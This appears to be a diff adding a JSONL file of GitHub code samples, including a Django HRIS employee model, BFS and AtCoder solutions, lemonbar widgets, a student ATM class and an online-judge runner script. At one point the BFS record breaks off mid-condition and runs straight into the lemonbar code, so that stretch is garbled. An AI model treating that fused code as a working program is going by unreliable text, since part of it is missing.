diff --git "a/6266.jsonl" "b/6266.jsonl" new file mode 100644--- /dev/null +++ "b/6266.jsonl" @@ -0,0 +1,837 @@ +{"seq_id":"19299662987","text":"import logging\n\nfrom pathlib import Path\nfrom django.db import models, IntegrityError\nfrom django.db.models.signals import pre_save\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom common.functions import password_generator\nfrom hris_integration.models.encryption import PasswordField\nfrom hris_integration.models import InactiveMixin\nfrom time import time\nfrom employee.validators import UPNValidator, UsernameValidator\nfrom extras.models import Notification\n\nfrom .base import EmployeeBase\n\nlogger = logging.getLogger(\"employee.models\")\n__all__ = (\"employee_upload_to\", \"Employee\", \"EmployeeImport\")\n\nUPDATE_FIELDS_ALWAYS = [\n # \"manager\", # updated in pre_save\n \"primary_job\",\n # \"jobs\", # updated in pre_save\n \"type\",\n \"state\",\n \"leave\",\n \"start_date\",\n]\nUPDATE_FIELDS_OPTIONAL = [\n \"first_name\",\n \"last_name\",\n \"middle_name\",\n \"location\",\n \"email_alias\",\n \"username\",\n]\n\n\ndef employee_upload_to(instance: \"Employee\", filename: str) -> str:\n \"\"\"\n The upload_to file path resolver function for the Employee model's image field.\n\n :param instance: the Employee instance\n :type instance: Employee\n :param filename: The filename of the uploaded file\n :type filename: str\n :return: the file path\n :rtype: str\n \"\"\"\n\n return f\"employeephoto/{instance.id}/{filename}\"\n\n\nclass Employee(EmployeeBase, InactiveMixin):\n \"\"\"The base Employee Form. This represents the mutable entity for each employee.\n This table used the Modified Preorder Tree Traversal extension to allow for mappings\n between the employee and the employee's manager and my extension direct-reports.\n \"\"\"\n\n class Meta:\n db_table = \"employee\"\n\n id = models.AutoField(primary_key=True)\n #: The Employee ID for the employee.\n employee_id: int = models.IntegerField(blank=True, null=True, unique=True)\n #: If this model has a matched EmployeeImport record.\n is_imported: bool = models.BooleanField(default=False)\n #: If the employee has been exported to Active Directory. 
Used for filtering.\n is_exported_ad: bool = models.BooleanField(default=False)\n #: The Active Directory unique identifier for the employee.\n guid: str = models.CharField(max_length=40, null=True, blank=True)\n\n #: The nickname of the employee.\n nickname: str = models.CharField(max_length=96, null=True, blank=True)\n #: Designations that the employee holds\n designations: str = models.CharField(max_length=256, blank=True, null=True)\n #: The path the the employees uploaded file.\n photo: str = models.FileField(upload_to=employee_upload_to, null=True, blank=True)\n\n #: The employees password (encrypted at the database level).\n password: str = PasswordField(null=True, blank=True, default=password_generator)\n\n def __eq__(self, other) -> bool:\n \"\"\"Checks if the two models are the same using key fields.\"\"\"\n\n if not isinstance(other, Employee):\n return False\n\n if int(self.id) != int(other.pk):\n return False\n\n for field in [\n \"first_name\",\n \"last_name\",\n \"middle_name\",\n \"suffix\",\n \"start_date\",\n \"state\",\n \"leave\",\n \"username\",\n \"photo\",\n \"email_alias\",\n ]:\n if getattr(self, field) != getattr(other, field):\n return False\n\n if (\n self.manager is None\n and other.manager is not None\n or self.manager is not None\n and other.manager is None\n ):\n return False\n elif self.manager and other.manager and self.manager.pk != other.manager.pk:\n return False\n if (\n self.location is None\n and other.location is not None\n or self.location is not None\n and other.location is None\n ):\n return False\n elif self.location and other.location and self.location.pk != other.location.pk:\n return False\n if (\n self.primary_job is None\n and other.primary_job is not None\n or self.primary_job is not None\n and other.primary_job is None\n ):\n return False\n elif (\n self.primary_job\n and other.primary_job\n and self.primary_job.pk != other.primary_job.pk\n ):\n return False\n\n return True\n\n def __ne__(self, other) -> bool:\n return not self.__eq__(other)\n\n def __hash__(self):\n if self.pk is None:\n raise TypeError(\"Model instances without primary key value are un-hashable\")\n return hash(self.pk)\n\n def __str__(self):\n return f\"Employee: {self.first_name} {self.last_name}\"\n\n def clear_password(self, confirm: bool = False) -> None:\n \"\"\"Unset the password field and save the model.\"\"\"\n if confirm:\n self.password = None\n self.save()\n\n @classmethod\n def reset_username(cls, instance: \"Employee\") -> None:\n \"\"\"Regenerate a username, useful for new employees or re-hired employees\n\n :param instance: The employee to reset the username for\n :param instance: Employee\n :raises ValueError: If the username cannot be generated after 10 cycles\n \"\"\"\n for x in range(0, 10):\n username = UsernameValidator(instance.first_name, instance.last_name, x)\n username.clean()\n if username.username == instance.username:\n return\n if username.is_valid():\n try:\n e = cls.objects.get(username=username.username)\n if e.id == instance.id:\n return\n\n except Employee.DoesNotExist:\n instance.username = username.username\n return\n\n raise ValueError(\"Could not generate a unique username\")\n\n @classmethod\n def reset_upn(cls, instance: \"Employee\") -> None:\n \"\"\"\n Regenerate a users upn or email_alias, useful for new employees or re-hired\n employees\n\n :param instance: The employee to reset the upn for\n :param instance: Employee\n :raises ValueError: If the username cannot be generated after 10 cycles\n \"\"\"\n for x in range(0, 
10):\n upn = UPNValidator(instance.first_name, instance.last_name, x)\n upn.clean()\n if upn.username == instance.email_alias:\n return\n if upn.is_valid():\n try:\n e = cls.objects.get(email_alias=upn.username)\n if e.id == instance.id:\n return\n\n except Employee.DoesNotExist:\n instance.email_alias = upn.username\n return\n\n raise ValueError(\"Could not generate a unique username\")\n\n @classmethod\n def pre_save(cls, sender, instance, raw, using, update_fields, **kwargs):\n try:\n if instance.id:\n prev_instance = Employee.objects.get(id=instance.id)\n else:\n prev_instance = None\n except Employee.DoesNotExist:\n prev_instance = None\n\n if prev_instance:\n if (\n prev_instance.status == cls.STATE_TERM\n and instance.status != cls.STATE_TERM\n ):\n logger.info(f\"{instance} transitioned from terminated to active\")\n cls.reset_username(instance)\n cls.reset_upn(instance)\n elif (\n prev_instance.status != instance.STATE_TERM\n and instance.status == instance.STATE_TERM\n ):\n logger.info(f\"{instance} transitioned from active to terminated\")\n t = str(round(time()))\n instance.username = instance.username[:15]\n instance.username += t[-(20 - len(instance.username)) :]\n instance.email_alias = f\"{instance.username}{round(time())}\"[:64]\n\n if instance.username is None:\n cls.reset_username(instance)\n\n if instance.email_alias is None:\n cls.reset_upn(instance)\n\n if prev_instance and prev_instance != instance:\n #: The employee has changed, so we need to update the updated_on field to\n # for correct delta changes.\n instance.updated_on = timezone.now()\n if prev_instance.photo and prev_instance.photo != instance.photo:\n # Delete the old photo\n f = Path(settings.MEDIA_ROOT, str(prev_instance.photo.path))\n if f.exists():\n f.unlink()\n\n if instance.updated_on is None:\n instance.updated_on = timezone.now()\n\n if instance.username is None and instance.active:\n cls.reset_username(instance)\n\n if instance.email_alias is None and instance.active:\n cls.reset_upn(instance)\n\n\npre_save.connect(Employee.pre_save, sender=Employee)\n\n\nclass EmployeeImport(EmployeeBase):\n \"\"\"\n This Class is used to store the data that is imported from the upstream\n HRIS Database system.\n \"\"\"\n\n class Meta:\n db_table = \"employee_import\"\n\n #: The employee's id in the upstream HRIS system.\n id: int = models.IntegerField(primary_key=True)\n #: If the employee has been matched\n is_matched: bool = models.BooleanField(default=False)\n #: The matched Employee object.\n employee: Employee = models.OneToOneField(\n Employee, on_delete=models.PROTECT, blank=True, null=True\n )\n\n def __eq__(self, other) -> bool:\n \"\"\"Check if two EmployeeImport objects are equal using key values.\"\"\"\n if not isinstance(other, Employee):\n return False\n\n if int(self.id) != int(other.pk):\n return False\n\n for field in [\n \"first_name\",\n \"last_name\",\n \"middle_name\",\n \"suffix\",\n \"state\",\n \"leave\",\n ]:\n if getattr(self, field) != getattr(other, field):\n return False\n\n if (\n self.location is None\n and other.location is not None\n or self.location is not None\n and other.location is None\n ):\n return False\n elif self.location and other.location and self.location.pk != other.location.pk:\n return False\n if (\n self.primary_job is None\n and other.primary_job is not None\n or self.primary_job is not None\n and other.primary_job is None\n ):\n return False\n elif (\n self.primary_job\n and other.primary_job\n and self.primary_job.pk != other.primary_job.pk\n ):\n return 
False\n\n return True\n\n def __ne__(self, other) -> bool:\n return not self.__eq__(other)\n\n def __hash__(self):\n if self.pk is None:\n raise TypeError(\"Model instances without primary key value are un-hashable\")\n return hash(self.pk)\n\n def __str__(self) -> str:\n return f\"{self.id}: {self.first_name} {self.last_name}\"\n\n @classmethod\n def pre_save(cls, sender, instance, raw, using, update_fields, **kwargs):\n if instance.employee and not instance.is_matched:\n instance.is_matched = True\n elif instance.employee is None and instance.is_matched:\n instance.is_matched = False\n\n if instance.id:\n try:\n prev_instance = EmployeeImport.objects.get(id=instance.id)\n except EmployeeImport.DoesNotExist:\n prev_instance = None\n else:\n prev_instance = None\n\n if prev_instance and instance != prev_instance:\n instance.updated_on = timezone.now()\n\n if instance.is_matched:\n ec = False\n if (\n instance.manager\n and instance.manager != prev_instance.manager\n and instance.manager.is_matched\n ):\n instance.employee.manager = instance.manager.employee\n ec = True\n for job in instance.jobs.all():\n if job not in instance.employee.jobs.all():\n instance.employee.jobs.add(job)\n ec = True\n\n for key in UPDATE_FIELDS_OPTIONAL:\n if (\n getattr(instance.employee, key, None) is None\n or getattr(instance.employee, key)\n == getattr(prev_instance, key)\n and getattr(instance, key) != getattr(prev_instance, key)\n ):\n setattr(instance.employee, key, getattr(instance, key))\n ec = True\n\n for key in UPDATE_FIELDS_ALWAYS:\n if getattr(instance, key, None) != None:\n setattr(instance.employee, key, getattr(instance, key))\n ec = True\n\n if prev_instance.employee is None:\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n instance.employee.save()\n except IntegrityError:\n logger.warning(\n \"Employee ID is already associated with an employee,\"\n \"attempting to clear\"\n )\n e = Employee.objects.get(employee_id=instance.id)\n if e != instance.employee:\n e.employee_id = None\n e.is_imported = False\n logger.warning(f\"Unlinked employee id from {str(e)}\")\n e.save()\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n instance.employee.save()\n except IntegrityError:\n logger.error(\n f\"Failed to unlink employee id {instance.id} from \"\n f\"employee {str(e)}. Converting {str(instance)} to a \"\n \"pending employee.\"\n )\n instance.is_matched = False\n ec = True\n Notification.objects.create(\n message=(\n f\"Source employee {str(instance)} and employee \"\n f\"{str(instance.employee)} are in an inconsistent \"\n f\"state. 
Please validate that multiple employees are \"\n f\"not associated with the same employee ID.\"\n ),\n level=Notification.ERROR,\n source=\"Employee Import\",\n source_repr=repr(instance),\n source_id=instance.id,\n )\n\n if ec:\n instance.employee.save()\n\n if prev_instance is None and instance.is_matched:\n if instance.manager and instance.manager.is_matched:\n instance.employee.manager = instance.manager.employee\n for job in instance.jobs.all():\n instance.employee.jobs.add(job)\n for key in UPDATE_FIELDS_ALWAYS:\n if getattr(instance, key, None) != None:\n setattr(instance.employee, key, getattr(instance, key))\n\n for key in UPDATE_FIELDS_OPTIONAL:\n if getattr(instance.employee, key, None) is None:\n setattr(instance.employee, key, getattr(instance, key))\n\n if instance.employee:\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n instance.employee.save()\n ec = True\n except IntegrityError:\n logger.warning(\n \"Employee ID is already associated with an employee, attempting \"\n \"to clear\"\n )\n e = Employee.objects.get(employee_id=instance.id)\n if e != instance.employee:\n e.employee_id = None\n e.is_imported = False\n logger.warning(f\"Unlinked employee id from {str(e)}\")\n e.save()\n try:\n instance.employee.employee_id = instance.id\n instance.employee.is_imported = True\n ec = True\n except IntegrityError:\n logger.error(\n f\"Failed to unlink employee id {instance.id} from employee \"\n f\"{str(e)}. Converting {str(instance)} to a pending \"\n \"employee.\"\n )\n instance.is_matched = False\n ec = True\n Notification.objects.create(\n message=(\n f\"Source employee {str(instance)} and employee \"\n f\"{str(instance.employee)} are in an inconsistent \"\n f\"state. Please validate that multiple employees are \"\n f\"not associated with the same employee ID.\"\n ),\n level=Notification.ERROR,\n source=\"Employee Import\",\n source_repr=repr(instance),\n source_id=instance.id,\n )\n\n if instance.updated_on is None:\n instance.updated_on = timezone.now()\n\n\npre_save.connect(EmployeeImport.pre_save, sender=EmployeeImport)\n","repo_name":"jcarswell/hris-integration","sub_path":"hris_integration/employee/models/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":18546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17401539888","text":"from sys import *\ns=stdin.readline().split(\" \")\nn=int(s[0])\nk=int(s[1])\n\nm=[]\nfor j in range(n):\n m.append([])\n for i in range(n):\n m[j].append(0)\nfor i in range(k):\n s=stdin.readline().split(\" \")\n y=int(s[0])\n x=int(s[1])\n m[y][x]=1\nvisited=[]\ndef init():\n global visited\n for j in range(len(m)):\n visited.append([])\n for i in range(len(m[0])):\n visited[j].append(False)\ninit()\nclass Node:\n def __init__(self,x,y):\n self.x=x\n self.y=y\n self.parent=None\n def __eq__(self,o):\n return self.x==o.x and self.y==o.y\n def __str__(self):\n return str(self.x)+\":\"+str(self.y)\n\ntx=[0,1,0,-1]\nty=[1,0,-1,0]\ncount=0\ndef bfs(list_from,end):\n global visited,count\n new_list=[]\n for node in list_from:\n if node==end:\n return node\n for i in range(len(tx)):\n count+=1\n x=node.x+tx[i]\n y=node.y+ty[i]\n if x>=0 and y>=0 and x= self.prevtime + self.interval) or self.refresh:\n self.update()\n self.prevtime = time()\n self.refresh = False\n\n if self.display:\n return self.template.format_map(self.SafeDict(value=self.output))\n return ''\n\n def update(self):\n raise NotImplementedError('Function 
needs to be implemented')\n\n\nclass Raw(Base):\n def __init__(self, text='', **kwds):\n super().__init__(**kwds)\n self.output = text\n\n def __call__(self):\n return self.template.format_map(self.SafeDict(value=self.output))\n\n\nclass Align(Raw):\n def __init__(self, align, **kwds):\n super().__init__(**kwds)\n self.output = '%{{{}}}'.format(align)\n\n\nclass Clock(Widget):\n def __init__(self, layout='%d %b %Y %H:%M:%S', **kwds):\n super().__init__(**kwds)\n self.layout = layout\n\n def update(self):\n self.output = datetime.today().strftime(self.layout)\n\n\nclass Volume(Widget):\n def update(self):\n m = Mixer()\n self.output = '{}%'.format(m.getvolume()[0])\n\n\nclass WorkspacesDots(Widget):\n i3 = i3ipc.Connection()\n\n def __init__(self, underline=None,\n icons={'empty': 'o', 'nonempty': '0',\n 'visible': 'x'}, spacing=0, **kwds):\n super().__init__(**kwds)\n self.icons = {}\n for k, icon in icons.items():\n self.icons[k] = self.format_icon(icon)\n self.underline = underline\n self.spacing = spacing\n\n def update(self):\n out = [self.icons['empty'] for __ in range(10)]\n for workspace in self.i3.get_workspaces():\n ind = int(workspace['num']) - 1\n if ind < 0:\n ind = 9\n\n if workspace['visible']:\n out[ind] = self.icons['visible']\n else:\n out[ind] = self.icons['nonempty']\n\n if workspace['focused']:\n out[ind] = '%{!u}' + out[ind] + '%{!u}'\n\n self.output = (' '*self.spacing).join(out)\n\n if self.underline:\n self.output = '%{{U{}}}'.format(self.underline)\\\n + self.output + '%{U-}'\n\n\nclass Memory(Widget):\n def __init__(self, percentage=False, interval=5, **kwds):\n super().__init__(interval=interval, **kwds)\n self.percentage = percentage\n\n def update(self):\n with open('/proc/meminfo', 'r') as mem:\n total = 0\n available = 0\n for line in mem:\n line_split = line.split()\n if line_split[0] == 'MemTotal:':\n total = int(line_split[1])\n elif line_split[0] in ['MemFree:', 'Buffers:', 'Cached:']:\n available += int(line_split[1])\n used_mb = round((total-available)/1024)\n used_perc = round((available/total)*100)\n self.output = used_perc if self.percentage else used_mb\n self.output = str(self.output) + 'M'\n\n\nclass IPAddress(Widget):\n def __init__(self, interface='eth0', interval=900, **kwds):\n super().__init__(interval=interval, **kwds)\n self.interface = interface.encode('utf-8')\n\n def update(self):\n def get_ip_address(ifname):\n # Props to 'Martin Konecny' on SO\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15])\n )[20:24])\n self.output = get_ip_address(self.interface)\n\n\nclass Ping(Widget):\n def __init__(self, host='8.8.8.8', interval=5, **kwds):\n super().__init__(interval=interval, **kwds)\n self.host = host\n\n def update(self):\n ping = subprocess.Popen('ping -c1 -W1 {}'.format(self.host),\n shell=True, stdout=subprocess.PIPE\n ).stdout.read()\n reg = re.search('\\d\\d\\.\\d{3}/(\\d\\d\\.\\d{3})/\\d\\d\\.\\d{3}',\n ping.decode())\n if reg:\n self.output = round(float(reg.groups()[0]))\n else:\n self.output = 0\n self.output = str(self.output) + 'ms'\n\n\nclass Music(Widget):\n player = Playerctl.Player()\n\n def update(self):\n if self.player.get_property('status') == 'Playing':\n self.display = True\n self.output = '{} - {}'.format(self.player.get_artist(),\n self.player.get_title())\n else:\n self.display = False\n\n\nclass Battery(Widget):\n ''' Load from sys class '''\n def __init__(self, power_supply='BAT0',\n 
icons={'charging': 'c', 'discharging': 'd'}, **kwds):\n super().__init__(**kwds)\n self.power_supply = power_supply\n self.icons = icons\n\n def update(self):\n with open('/sys/class/power_supply/{}/status'\\\n .format(self.power_supply), 'r') as f:\n charging = 'Charging' in f.read()\n\n with open('/sys/class/power_supply/{}/capacity'\\\n .format(self.power_supply), 'r') as f:\n capacity = f.read().strip()\n\n if charging:\n self.output = '{} '.format(self.icons['charging'])\n else:\n num_of_icons = len(self.icons['discharging'])\n ind = round(int(capacity)/100 * (num_of_icons-1))\n self.output = '{} '.format(self.icons['discharging'][ind])\n self.output += '{}%'.format(capacity)\n\n\nclass Wifi(Widget):\n def __init__(self, interface='wlan0', **kwds):\n super().__init__(**kwds)\n self.interface = interface\n\n def update(self):\n try:\n ssid = subprocess.check_output(['iw', 'dev', self.interface, 'info'])\n for l in ssid.split(b'\\n\\t'):\n if l.startswith(b'ssid'):\n self.output = l[5:].decode()\n except subprocess.CalledProcessError:\n self.output = 'Interface N/A'\n","repo_name":"Linouth/Lemonbar-Helper","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":8797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"2808193046","text":"#Lab12 ATM\n#A newly created account will default to a balance of 0 and an interest rate of 0.1%. \n#I think this has to do with class tree data types (with initializer) from lecture 28May, commented out below\n'''class Tree:\n def __init__(self, data, children=None, parent=None):\n self.data = data\n self.children = children or []\n self.parent = parent\n\n def add_child(self, data):\n child = Tree(data, parent=self)\n self.children.append(child)'''\n#let us try\nclass ATM:\n def __init__(self, balance = 0, interest_rate = 0.001, amount = 0):#balance always starts 1, interest rate 0.1\n #when you set one of the args for __init__ equal to something this means it is a default (from pete)\n self.balance = balance #arg1\n self.interest_rate = interest_rate #arg2\n self.transactions = []\n #balance is the first function we want to return something directly from __init__\n def get_balance(self):\n #self.balance = balance\n return self.balance\n #deposit is the second function that is not doing the same thing upon initialization\n def deposit(self, amount):\n #we want the balance value to increase\n self.balance += amount\n self.transactions.append(f\"user deposited {amount}.\")\n #check_withdrawal is the third function that is not doing the same thing upon initialization\n def check_withdrawal(self, amount):#in the future this could be made into a private method __check_withdrawal, so the user is not bothered by having to see this\n #we want to return true if the withdrawn amount wont make account negative\n if self.balance >= amount:\n return True\n #withdraw is the fourth function that is not doing the same thing upon initialization\n def withdraw(self, amount):\n #we want to decrease the balance by that amount\n self.balance -= amount\n self.transactions.append(f\"user withdrew {amount}.\")\n #calc_interest is the fifth function that is not doing the same thing upon initialization\n def calc_interest(self):\n #we want to multiply the balance by the interest rate, not sure what we should do with the earnings\n return self.balance * self.interest_rate\n def print_transactions(self):\n print(\"/n\".join(self.transactions))#join () method takes all items in an iterable and 
joins them into one string. A string must be specified as the separator. W3Schools\n\n \n '''balance(self, account):\n balance = ATM(account, balance=self)\n self.balance.append(balance)#I feel like I do not know what this means.\n def interest_rate(self, account):\n interest_rate = ATM(account, interest_rate=self)\n self.interest_rate.append(interest_rate)\n def '''\n#implement initilizer\natm = ATM() # create an **instance** of our class (also known as instantiating)\nprint('atm variable is ' + str(atm))\nprint('Welcome to the ATM')\nwhile True:\n command = input('Enter a command: balance, deposit, withdraw, interest, previous transactions, help, exit ')\n if command == 'balance':\n print('command is ' +str(command))\n #print('balance is ' + str(balance))#the variable balance has not been defined yet, here\n #print(atm.balance())\n balance = atm.get_balance() # call the balance() method\n print(f'Your balance is ${balance}')\n elif command == 'deposit':\n amount = float(input('How much would you like to deposit? '))\n atm.deposit(amount) # call the deposit(amount) method\n print(f'Deposited ${amount}')\n elif command == 'withdraw':\n amount = float(input('How much would you like '))\n if atm.check_withdrawal(amount): # call the check_withdrawal(amount) method\n atm.withdraw(amount) # call the withdraw(amount) method\n print(f'Withdrew ${amount}')\n else:\n print('Insufficient funds')\n elif command == 'interest':\n amount = atm.calc_interest() # call the calc_interest() method\n #atm.deposit(amount)\n print(f'Accumulated ${amount} in interest')\n #Previous transactions is for Version 2\n elif command == 'previous transactions':\n history = atm.print_transactions()\n elif command == 'help':\n print('Available commands:')\n print('balance - get the current balance')\n print('deposit - deposit money')\n print('withdraw - withdraw money')\n print('interest - accumulate interest')\n print('exit - exit the program')\n elif command == 'exit':\n break\n else:\n print('Command not recognized')\n'''begin = input('hey would you like to start? 
yes or no?').lower()\nif begin == 'yes':\n print(initializer())\nelse:\n pass\n\ndef initializer():'''\n ","repo_name":"PdxCodeGuild/class_salmon","sub_path":"code/nick/python/lab12.py","file_name":"lab12.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"90"}
+{"seq_id":"18273820809","text":"def main():\n N = int(input())\n List = list(map(int,input().split()))\n Set = set()\n for i in List:\n if i in Set:\n \tprint('NO')\n \treturn\n Set.add(i)\n print('YES')\n return\nmain()","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02779/s732399337.py","file_name":"s732399337.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"18406295239","text":"# https://atcoder.jp/contests/abc126/tasks/abc126_d\n\n# Do a DFS, fixing the color of the starting node as black or white; keep adding nodes whose distance is even.\nn = int(input())\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n u, v, w = map(int, input().split())\n u -= 1\n v -= 1\n tree[u].append((v, w))\n tree[v].append((u, w))\n\n\ndef dfs(tree, n):\n visited = [False] * n\n dis = [0] * n\n even = set([0])\n stack = [0]\n while stack:\n v = stack.pop()\n cur_dis = dis[v]\n for next_v, d in tree[v]:\n if not visited[next_v]:\n visited[next_v] = True\n stack.append(next_v)\n dis[next_v] = cur_dis + d\n if (cur_dis + d) % 2 == 0:\n even.add(next_v)\n return even\n\neven = dfs(tree, n)\nfor i in range(n):\n if i in even:\n print(0)\n else:\n print(1)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03044/s874747994.py","file_name":"s874747994.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"}
+{"seq_id":"7018441016","text":"\"\"\"\n Input by 9 or more argument\n 1 : test case\n 2 : timeLimit in ms\n 3 : memoryLimit in mb\n 4 : PROBLEM_DIR\n 5 : source path\n 6 : cmp cmd\n 7 : cmp args\n 8 : run cmd\n 9 : run args\n\n output will return by stdout in formating below\n {verdic};{score};{maxscore};{elapsed};{memory};{comment}\n\"\"\"\nfrom os import path\nimport os\nimport sys\nfrom subprocess import Popen,TimeoutExpired,PIPE\nimport time\nimport signal\n\njudgeArgs = sys.argv[-1]\n\nif not path.exists(judgeArgs):\n print(f\"!;0;1;0;0;Judge args not found :(\",end = \"\")\n exit(0)\n\ntry:\n with open(judgeArgs,\"r\") as f:\n judgeArgs = f.read().split(\"\\n\")\n\nexcept:\n print(f\"!;0;1;0;0;Can't read Judge args:(\",end = \"\")\n exit(0)\n\nif(len(judgeArgs) < 9):\n print(f\"!;0;1;0;0;Not Enough info to judge\\nexpected 9 args got {len(judgeArgs)} args\",end = \"\")\n exit(0)\n\ntry:\n\n testCase = judgeArgs[0] or \"\"\n timeLimit = int(judgeArgs[1] or \"\")#In ms\n memoryLimit = int(judgeArgs[2] or \"\")#mb\n PROBLEM_DIR = judgeArgs[3] or \"\"\nexcept:\n print(f\"!;0;1;0;0;Can't convert data :(\",end = \"\")\n exit(0)\n\nif(len(judgeArgs) < 6):\n print(f\"!;0;1;0;0;Program not Found\",end = \"\")\n exit(0)\n\n\nsrcPath = judgeArgs[4] or \"\"\n\ncmpMain = judgeArgs[5] or \"\"\ncmpArg = judgeArgs[6] or \"\"\n\noutMain = judgeArgs[7]\noutArg = judgeArgs[8]\n\n\ninPath = path.join(PROBLEM_DIR,f\"{testCase}.in\")\noutPath = path.join(PROBLEM_DIR,\"output.txt\")\nerrPath = path.join(PROBLEM_DIR,\"errout.txt\")\nsolPath = path.join(PROBLEM_DIR,f\"{testCase}.sol\")\n\n\ndef writeLog(text:str):\n with open(path.join(PROBLEM_DIR,f\"{int(time.time())}LOG.txt\"),\"w\") as f:\n f.write(text)\n\ndef 
execute_Window():\n start_time = time.time()\n runner = Popen(f'{outMain} {outArg} < \"{inPath}\" > \"{outPath}\" 2> \"{errPath}\"',shell= True)\n\n try:\n runner.communicate(timeout=timeLimit/1000)\n returnCode = runner.returncode\n except TimeoutExpired:\n runner.terminate()\n runner.kill()\n return timeLimit,0,\"TIMELXC\"\n\n runner.terminate()\n runner.kill()\n\n elapsed = time.time() - start_time\n\n\n if returnCode != 0:\n return elapsed*1000,0,f\"WTF M{returnCode}\"\n else:\n return elapsed*1000,0,\"OK\"\n\ndef execute_linux():\n\n isJava = outMain.find(\"java\")\n\n if isJava != -1:\n start_time = time.time()\n runner = Popen(f'{outMain} -Xmx{int(memoryLimit)}M {outArg} < \"{inPath}\" > \"{outPath}\" 2> \"{errPath}\" ; exit', shell= True, preexec_fn=os.setsid)\n else:\n start_time = time.time()\n runner = Popen(f'ulimit -v {memoryLimit*1000};{outMain} {outArg} < \"{inPath}\" > \"{outPath}\" 2> \"{errPath}\" ; exit',shell= True, preexec_fn=os.setsid)\n\n try:\n runner.communicate(timeout=timeLimit/1000)\n returnCode = runner.returncode\n except TimeoutExpired:\n if os.path.exists(\"/proc/\" + str(runner.pid)):\n os.killpg(os.getpgid(runner.pid), signal.SIGTERM)\n return timeLimit,0,\"TIMELXC\"\n\n if os.path.exists(\"/proc/\" + str(runner.pid)):\n os.killpg(os.getpgid(runner.pid), signal.SIGTERM)\n\n elapsed = time.time() - start_time\n\n\n if returnCode != 0:\n return elapsed*1000,0,f\"WTF M{returnCode}\"\n else:\n return elapsed*1000,0,\"OK\"\n\n\ndef execute():\n if sys.platform == \"linux\" or sys.platform == \"linux2\":\n return execute_linux()\n else:\n return execute_Window()\n\n\n\n\n\n\ndef compare():\n\n if(not path.exists(outPath)):return \"-\",\"File not found :(\\n\"\n\n if sys.platform == \"linux\" or sys.platform == \"linux2\":\n runner = Popen(f'cd \"{PROBLEM_DIR}\"; {cmpMain} {cmpArg} \"{solPath}\" \"{inPath}\" \"{srcPath}\"', stdout=PIPE, stdin=PIPE, stderr=PIPE,shell= True)\n else:\n runner = Popen(f'cd /d \"{PROBLEM_DIR}\" & {cmpMain} {cmpArg} \"{solPath}\" \"{inPath}\" \"{srcPath}\"', stdout=PIPE, stdin=PIPE, stderr=PIPE,shell= True)\n \n #writeLog(f'cd /d \"{PROBLEM_DIR}\" & {cmpMain} {cmpArg} \"{solPath}\" \"{inPath}\" \"{srcPath}\"')\n\n runner.communicate()\n\n if not path.exists(path.join(PROBLEM_DIR,\"grader_result.txt\")):\n return \"!\",\"grader_result Not found\"\n \n resultVerdict = \"\"\n with open(path.join(PROBLEM_DIR,\"grader_result.txt\"),\"r\") as f:\n resultVerdict = f.read().split(\"\\n\")\n \n if len(resultVerdict) == 0:\n return \"!\",0,1,\"grader Not respond :(\"\n\n if len(resultVerdict) == 1:\n if resultVerdict[0] == \"P\":\n return \"P\",1,1,\"Test ok Yey!\"\n elif resultVerdict[0] == \"W\" or resultVerdict[0] == \"-\":\n return \"-\",0,1,\"Wrong Answer\"\n else:\n return resultVerdict[0],0,1,\"????\"\n \n if len(resultVerdict) == 3:\n\n tScore = 0\n tMaxScore = 0\n \n try:\n tScore = int(resultVerdict[1])\n tMaxScore = int(resultVerdict[2])\n except:\n return \"!\",0,1,\"Can't convert score to int\"\n\n if resultVerdict[0] == \"P\":\n return \"P\",tScore,tMaxScore,\"Test ok Yey!\"\n elif resultVerdict[0] == \"H\":\n return \"H\",tScore,tMaxScore,\"Partially correct\"\n elif resultVerdict[0] == \"W\" or resultVerdict[0] == \"-\":\n return \"-\",tScore,tMaxScore,\"Wrong Answer\"\n else:\n return resultVerdict[0],tScore,tMaxScore,\"????\"\n \n if len(resultVerdict) == 4:\n\n tScore = 0\n tMaxScore = 0\n commm = resultVerdict[3]\n \n try:\n tScore = int(resultVerdict[1])\n tMaxScore = int(resultVerdict[2])\n except:\n return 
\"!\",0,1,\"Can't convert score to int\"\n\n if resultVerdict[0] == \"W\":\n resultVerdict[0] = '-'\n\n return resultVerdict[0],tScore,tMaxScore,commm\n\n\n return \"?\",1,1,\"WUT?\"\n\n \n\n\n#This is from Kiyago's standard judge\ndef main():\n \n if not path.exists(inPath):\n print(f\"E;0;0;0;0;End of Test\",end = \"\")\n return\n elapsed, memory, comment = execute()\n\n score = 0\n maxscore = 1.0\n if comment == \"OK\":\n\n verdic,score,maxscore,comment = compare()\n\n elif comment == \"JUDGEER\":\n verdic = \"!\"\n comment = \"Judge_Error\"\n\n elif comment == \"TIMELXC\":\n verdic = \"T\"\n comment = f\"Time Limit Exceed\\n\\nYour program run {elapsed} ms.\"\n else:\n verdic = \"X\"\n comment += f\"\\nRuntime Error!\\n============Error============\\n\"\n\n if path.exists(errPath):\n\n with open(errPath,\"r\") as f:\n comment += f.read()\n\n # Clean up tmp directory\n try:\n #if(path.exists(outPath)):os.remove(outPath)\n #if(path.exists(errPath)):os.remove(errPath)\n pass\n except:\n pass\n\n print(f\"{verdic};{score};{maxscore};{elapsed:.2f};{memory};{comment}\",end = 